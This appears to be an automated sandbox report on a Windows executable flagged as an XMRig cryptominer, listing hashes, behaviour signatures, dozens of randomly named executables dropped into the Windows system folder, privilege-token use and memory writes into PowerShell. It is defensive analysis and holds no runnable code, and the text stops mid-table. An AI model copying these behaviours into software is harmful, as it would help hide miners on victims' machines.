Malware Analysis Report

2025-04-19 17:56

Sample ID 240527-fadwcshe34
Target 1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe
SHA256 278b7dcb8b8b9d016e467be505f90d2819a9909157fbff258754812c33494627
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

278b7dcb8b8b9d016e467be505f90d2819a9909157fbff258754812c33494627

Threat Level: Known bad

The file 1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 04:39

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 04:39

Reported

2024-05-27 04:42

Platform

win7-20240221-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\FDLeIvg.exe N/A
N/A N/A C:\Windows\System\oGCXxxs.exe N/A
N/A N/A C:\Windows\System\NBwwSeE.exe N/A
N/A N/A C:\Windows\System\WfHbuen.exe N/A
N/A N/A C:\Windows\System\HOOeZOI.exe N/A
N/A N/A C:\Windows\System\OdJEkua.exe N/A
N/A N/A C:\Windows\System\IIkAmVd.exe N/A
N/A N/A C:\Windows\System\dnGebKH.exe N/A
N/A N/A C:\Windows\System\IQchZOJ.exe N/A
N/A N/A C:\Windows\System\HDhVHCy.exe N/A
N/A N/A C:\Windows\System\bJNRUtZ.exe N/A
N/A N/A C:\Windows\System\XDfVSGN.exe N/A
N/A N/A C:\Windows\System\diKaaKt.exe N/A
N/A N/A C:\Windows\System\jrSOrkG.exe N/A
N/A N/A C:\Windows\System\waHeSAk.exe N/A
N/A N/A C:\Windows\System\iYabiuZ.exe N/A
N/A N/A C:\Windows\System\voSvWQc.exe N/A
N/A N/A C:\Windows\System\FxhehAh.exe N/A
N/A N/A C:\Windows\System\YrFARoH.exe N/A
N/A N/A C:\Windows\System\gdOLxKL.exe N/A
N/A N/A C:\Windows\System\axIkokP.exe N/A
N/A N/A C:\Windows\System\vAJZOHV.exe N/A
N/A N/A C:\Windows\System\OBBmTtL.exe N/A
N/A N/A C:\Windows\System\vFhHTeW.exe N/A
N/A N/A C:\Windows\System\Ncmakup.exe N/A
N/A N/A C:\Windows\System\ZxoLqxz.exe N/A
N/A N/A C:\Windows\System\vnqFrqL.exe N/A
N/A N/A C:\Windows\System\CMNPxpd.exe N/A
N/A N/A C:\Windows\System\ZApfqSP.exe N/A
N/A N/A C:\Windows\System\zfHJQCJ.exe N/A
N/A N/A C:\Windows\System\cqUHqOD.exe N/A
N/A N/A C:\Windows\System\taIAGlq.exe N/A
N/A N/A C:\Windows\System\gWmybRy.exe N/A
N/A N/A C:\Windows\System\pMmZjfH.exe N/A
N/A N/A C:\Windows\System\eknxJdr.exe N/A
N/A N/A C:\Windows\System\XvROmgU.exe N/A
N/A N/A C:\Windows\System\AvomAav.exe N/A
N/A N/A C:\Windows\System\GMtFeyY.exe N/A
N/A N/A C:\Windows\System\kOZxiwr.exe N/A
N/A N/A C:\Windows\System\qRXJWRz.exe N/A
N/A N/A C:\Windows\System\WZJJeil.exe N/A
N/A N/A C:\Windows\System\mGHRLkd.exe N/A
N/A N/A C:\Windows\System\BxSCsgg.exe N/A
N/A N/A C:\Windows\System\mWQyPCJ.exe N/A
N/A N/A C:\Windows\System\NqqupPX.exe N/A
N/A N/A C:\Windows\System\nBMVerW.exe N/A
N/A N/A C:\Windows\System\xYpyeuP.exe N/A
N/A N/A C:\Windows\System\xlazHeq.exe N/A
N/A N/A C:\Windows\System\kIiLHYC.exe N/A
N/A N/A C:\Windows\System\dUanbYA.exe N/A
N/A N/A C:\Windows\System\pkZGZFy.exe N/A
N/A N/A C:\Windows\System\rAewIuS.exe N/A
N/A N/A C:\Windows\System\JeKguER.exe N/A
N/A N/A C:\Windows\System\RkffqUL.exe N/A
N/A N/A C:\Windows\System\QzcvKYO.exe N/A
N/A N/A C:\Windows\System\XEOhpeV.exe N/A
N/A N/A C:\Windows\System\TSzERwb.exe N/A
N/A N/A C:\Windows\System\lidiAxU.exe N/A
N/A N/A C:\Windows\System\epaSerL.exe N/A
N/A N/A C:\Windows\System\EjZRbTk.exe N/A
N/A N/A C:\Windows\System\MppZAVp.exe N/A
N/A N/A C:\Windows\System\kJLbmFR.exe N/A
N/A N/A C:\Windows\System\mOnwlSW.exe N/A
N/A N/A C:\Windows\System\KiQEWYm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\zixwhKa.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\dqkaAay.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\TKsxzfr.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QvCreHS.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\BiNMkdN.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbuZIoF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSyzaNO.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\xEZftWy.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\YhINCiE.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\jcYzGjP.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\XKvmxVe.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\OzCCctH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\CJYqNQp.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\pMZmbEK.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\RSKBOSW.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\pSoNaXq.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\CTeXAqj.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\RuKInkm.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\INgHzTF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\hJKkkYz.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\NQOOEYQ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\rPSPWRD.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\cBOktFI.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\shPjHBr.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\csWoBjL.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\OrJjDJJ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\LXlpqZV.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\yYJfXZN.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZPMYBjD.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\XvwRePB.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\LfxOndx.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\MmWvYBj.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\zMWFOot.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\slNlhUJ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\GRmABpT.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\eKVpAEa.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\TfeJKbP.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\uDWLqeJ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\UZeagfe.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\PRSsIHo.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\miIcomG.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\AdyhgjB.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\skcDNRM.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\Xcyqgnu.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\bbJSZzt.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QgAeGHl.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\YppYPNU.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\EARbUhx.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\TNfldVu.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\nXGUwnU.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\dloesXs.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\FlyLlKQ.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ALhfgWW.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\rRDwjCF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ghsVcfO.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\CNkRLsP.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\xkdzYkA.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\RVEdQKo.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QOfdKAH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\azxtMyF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\pUfLzPA.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\maTPRgH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\kNxGeyr.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\dtdFbEc.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1132 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1132 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1132 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1132 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FDLeIvg.exe
PID 1132 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FDLeIvg.exe
PID 1132 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FDLeIvg.exe
PID 1132 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\oGCXxxs.exe
PID 1132 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\oGCXxxs.exe
PID 1132 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\oGCXxxs.exe
PID 1132 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\NBwwSeE.exe
